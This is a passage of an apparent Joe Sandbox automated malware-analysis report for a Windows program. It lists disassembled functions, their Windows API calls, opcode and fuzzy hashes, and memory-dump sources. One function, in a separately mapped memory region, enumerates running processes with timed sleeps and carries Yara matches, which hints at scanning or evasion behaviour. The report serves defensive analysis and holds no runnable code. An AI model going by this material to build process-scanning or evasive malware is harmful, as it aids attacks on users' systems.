                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Mode$ColorCurrentObject$FillPolyStretchText
                                    • String ID:
                                    • API String ID: 544274770-0
                                    • Opcode ID: 1d5bab71774521d4a64bff84ad4520d36c0db43501587c4911c8efeddea002af
                                    • Instruction ID: 77de96109064adbf44b53bbfad18d61faf09a9191d5e0a5a00f93c84edda47c8
                                    • Opcode Fuzzy Hash: 1d5bab71774521d4a64bff84ad4520d36c0db43501587c4911c8efeddea002af
                                    • Instruction Fuzzy Hash: B0516E35210B119BC764DB60D988FABB3A6EF84701F940A2DE16F87250DF78F885CB58
                                    Function 00440400 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 282COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProfileStringA.KERNEL32(windows,device,,,,,?,000001F4), ref: 0044047F
                                    • GetProfileStringA.KERNEL32(devices,00000000,005DFD88,?,00001000), ref: 004404B3
                                    • GetProfileStringA.KERNEL32(devices,?,,,,,?,000000C8), ref: 0044053A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ProfileString
                                    • String ID: ,,,$device$devices$none$windows
                                    • API String ID: 1468043044-528626633
                                    • Opcode ID: 6bfccbb612cbb3ba4a717ec3bc5e1a3a139b8f01305b4c9fab8859c901b4c85b
                                    • Instruction ID: fa7f01d14492ac0fa5150ca370e6c2da17ad29fba160938f66ee0c7972274479
                                    • Opcode Fuzzy Hash: 6bfccbb612cbb3ba4a717ec3bc5e1a3a139b8f01305b4c9fab8859c901b4c85b
                                    • Instruction Fuzzy Hash: 28B1A3702083809FE324EB65C881FDFB7E4EF95758F404A1EF59583291DB78AA05CB66
                                    Function 00420880 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 220windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateSolidBrush.GDI32(00000000), ref: 0042097D
                                    • SendMessageA.USER32(?,00000154,00000000,00000000), ref: 004209F5
                                    • SendMessageA.USER32(?,00000153,00000000,?), ref: 00420A0E
                                    • SendMessageA.USER32(?,00000141,?,00000000), ref: 00420A1F
                                    • SendMessageA.USER32(?,00000143,00000000,?), ref: 00420A5B
                                    • SendMessageA.USER32(?,00000143,00000000), ref: 00420A7E
                                    • SendMessageA.USER32(?,0000014E,?,00000000), ref: 00420AAF
                                    • SendMessageA.USER32(?,00000142,00000000,?), ref: 00420AE9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$BrushCreateSolid
                                    • String ID: COMBOBOX
                                    • API String ID: 943060551-1136563877
                                    • Opcode ID: e579a0adb62aa866f88f3ec3171cdcb78fb8f6a5ca5bee03c64a1ecb04133239
                                    • Instruction ID: 49472df15ec56773b8932c812eeab726f1df762034ffda2ecce03c25953fee2e
                                    • Opcode Fuzzy Hash: e579a0adb62aa866f88f3ec3171cdcb78fb8f6a5ca5bee03c64a1ecb04133239
                                    • Instruction Fuzzy Hash: 9871AFB1700B10AFE320DB69CC81F6BB3E5EB84714F504A2EF69687391D678E845CB55
                                    Function 0043A5C0 Relevance: 15.3, APIs: 10, Instructions: 305windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetStretchBltMode.GDI32(?,00000000), ref: 0043A5D4
                                    • GetObjectA.GDI32(?,00000018,?), ref: 0043A6B2
                                    • StretchBlt.GDI32(?,000000FF,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0043A77F
                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,008800C6), ref: 0043A7B9
                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0043A7F3
                                    • SelectObject.GDI32(00000000,?), ref: 0043A878
                                    • StretchBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?), ref: 0043A8BB
                                    • SelectObject.GDI32(00000000,?), ref: 0043A8C7
                                    • DeleteDC.GDI32(00000000), ref: 0043A8CE
                                    • DrawIconEx.USER32(?,?,?,?,?,?,00000000,00000000,00000003), ref: 0043A90D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Stretch$Object$Select$DeleteDrawIconMode
                                    • String ID:
                                    • API String ID: 2323559851-0
                                    • Opcode ID: fc47425ef97f05473bd44afea575be221c1fd43ef92ef980ec8f121d142c4fe3
                                    • Instruction ID: d48a94e1a85d7ace7c618af6ffa5ba3cdfd303b952d6bae7a37ed94e693e6899
                                    • Opcode Fuzzy Hash: fc47425ef97f05473bd44afea575be221c1fd43ef92ef980ec8f121d142c4fe3
                                    • Instruction Fuzzy Hash: 5CB14675644704AFD354DB25CC85F6BB3E9FB88714F208A1DF6A683290DB74EC028B66
                                    Function 0042A8B0 Relevance: 15.3, APIs: 10, Instructions: 287libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcAddress.KERNEL32(?,?), ref: 0042A917
                                    • LoadLibraryA.KERNEL32(?,?,?), ref: 0042AA09
                                    • LoadLibraryA.KERNEL32(?,?), ref: 0042AA4F
                                    • LoadLibraryA.KERNEL32(?,?,?,00000001), ref: 0042AA97
                                    • LoadLibraryA.KERNEL32(00000001), ref: 0042AAAD
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042AABF
                                    • FreeLibrary.KERNEL32(00000000), ref: 0042AB52
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Library$Load$AddressProc$Free
                                    • String ID:
                                    • API String ID: 3120990465-0
                                    • Opcode ID: be945d8b9f74d2d25a15fda3fe271baf465a214912efb68d196ff90e06e56ea4
                                    • Instruction ID: 610a07ea23460aaf15659ed2845d6584fd7f7f6b806a38852aff964e6c7f31be
                                    • Opcode Fuzzy Hash: be945d8b9f74d2d25a15fda3fe271baf465a214912efb68d196ff90e06e56ea4
                                    • Instruction Fuzzy Hash: 05A1CFB1700711ABC314DF65D881FABF3A8BF95314F444A2EF85497341DB38A915CBAA
                                    Function 004357D0 Relevance: 15.2, APIs: 10, Instructions: 179COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 004357ED
                                    • GetWindowRect.USER32(?,?), ref: 004357FC
                                    • IntersectRect.USER32(?,?,?), ref: 00435855
                                    • EqualRect.USER32(?,?), ref: 00435885
                                    • GetWindowRect.USER32(?,?), ref: 004358A3
                                    • OffsetRect.USER32(?,?,?), ref: 0043591A
                                    • OffsetRect.USER32(?,?,00000000), ref: 00435934
                                    • OffsetRect.USER32(?,?,00000000), ref: 0043594C
                                    • OffsetRect.USER32(?,00000000,?), ref: 00435966
                                    • OffsetRect.USER32(?,00000000,?), ref: 0043597E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Offset$Window$EqualIntersect
                                    • String ID:
                                    • API String ID: 2638238157-0
                                    • Opcode ID: 0813bd47002bc1d841343946bc2eb27fc77ffd8947c954d93dc8e3fd7108e843
                                    • Instruction ID: 4beb2ee42f0df3a25851d0158a2c8b3f3a73d78224ee225b60a6aa547435629a
                                    • Opcode Fuzzy Hash: 0813bd47002bc1d841343946bc2eb27fc77ffd8947c954d93dc8e3fd7108e843
                                    • Instruction Fuzzy Hash: 1C51E9B56083069FC708CF29C98096BBBE9AFC8754F104A2EF985D3354DA74ED05CB56
                                    Function 02425119 Relevance: 15.1, APIs: 10, Instructions: 147sleepprocessCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0242515E
                                    • Process32First.KERNEL32(00000000,00000128), ref: 024251A7
                                    • CharUpperA.USER32(?,00000000,00000128,00000002,00000000), ref: 024251BB
                                    • Sleep.KERNEL32(00000400), ref: 02425231
                                    • Sleep.KERNEL32(00000400), ref: 0242527C
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 02425290
                                    • CharUpperA.USER32(?,00000000,00000128,00000000,00000128,00000002,00000000), ref: 024252A4
                                    • Sleep.KERNEL32(00000400), ref: 024252EF
                                    • Sleep.KERNEL32(00000400), ref: 02425367
                                    • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 0242537D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CharProcess32Uppertolower$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 4243119484-0
                                    • Opcode ID: 2beb91a4a468f440c53eb63d251f9dee6394db2a47ff98973aa30104e11c03e3
                                    • Instruction ID: 9dd1f937257e04917ed6ccf9b94fa6a6191a9fe0d07587a2aa4c2f84e522fd2d
                                    • Opcode Fuzzy Hash: 2beb91a4a468f440c53eb63d251f9dee6394db2a47ff98973aa30104e11c03e3
                                    • Instruction Fuzzy Hash: 6951C4B1D002288BDB28EF52CD48BEAB775AF44304F8045DAD50AA7240D7B5AFC5CFA1
                                    Function 00414290 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 267windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateSolidBrush.GDI32(00000000), ref: 004143D8
                                    • SendMessageA.USER32(?,000000C5,?,00000000), ref: 00414469
                                    • SendMessageA.USER32(?,000000CC,?,00000000), ref: 00414481
                                    • SendMessageA.USER32(?,00000465,00000000,?), ref: 0041454B
                                    • SendMessageA.USER32(?,000000B1,?,?), ref: 00414588
                                    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00414597
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$BrushCreateSolid
                                    • String ID: EDIT$msctls_updown32
                                    • API String ID: 943060551-1401569126
                                    • Opcode ID: 707c975f4670d50386fd4e61e202c3a467beaffa6b37b0fb3f88a0226d56482c
                                    • Instruction ID: cbaa40f897137ba9cd8e8e9ff6fa29725c37e5d0561e397f5141d0d33328975e
                                    • Opcode Fuzzy Hash: 707c975f4670d50386fd4e61e202c3a467beaffa6b37b0fb3f88a0226d56482c
                                    • Instruction Fuzzy Hash: 9991C271700B05ABE724DB28CC45FABB3E5BBC4744F10491EF6A6D7380DA78E8818B59
                                    Function 00424770 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Object__ftol$Stock
                                    • String ID: DISPLAY
                                    • API String ID: 4221631233-865373369
                                    • Opcode ID: 98bb9be8dcaa1b29be262afb6ebdb1c8d8f6d1f71898e13bb5702acc084852c2
                                    • Instruction ID: 9b7bd0461c7c74b99b9863cb13fad8438760ba74cfd308decd75e788b02e6043
                                    • Opcode Fuzzy Hash: 98bb9be8dcaa1b29be262afb6ebdb1c8d8f6d1f71898e13bb5702acc084852c2
                                    • Instruction Fuzzy Hash: 7B41E034704341DBC710EF25EC81B6A77A4FB89754F440A3EF58AA6291DB78D505CB2A
                                    Function 004C5DFE Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • TlsGetValue.KERNEL32(006142FC,006142EC,00000000,005BDEE8,006142FC,?,004C6066,006142EC,00000000), ref: 004C5E09
                                    • RtlEnterCriticalSection.NTDLL(00614318), ref: 004C5E58
                                    • RtlLeaveCriticalSection.NTDLL(00614318), ref: 004C5E6B
                                    • LocalAlloc.KERNEL32(00000000,00000004,?,004C6066,006142EC,00000000), ref: 004C5E81
                                    • LocalReAlloc.KERNEL32(?,00000004,00000002,?,004C6066,006142EC,00000000), ref: 004C5E93
                                    • TlsSetValue.KERNEL32(006142FC,00000000,004C6066,006142EC,00000000), ref: 004C5ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                    • String ID: Ba$^L
                                    • API String ID: 4117633390-3130641138
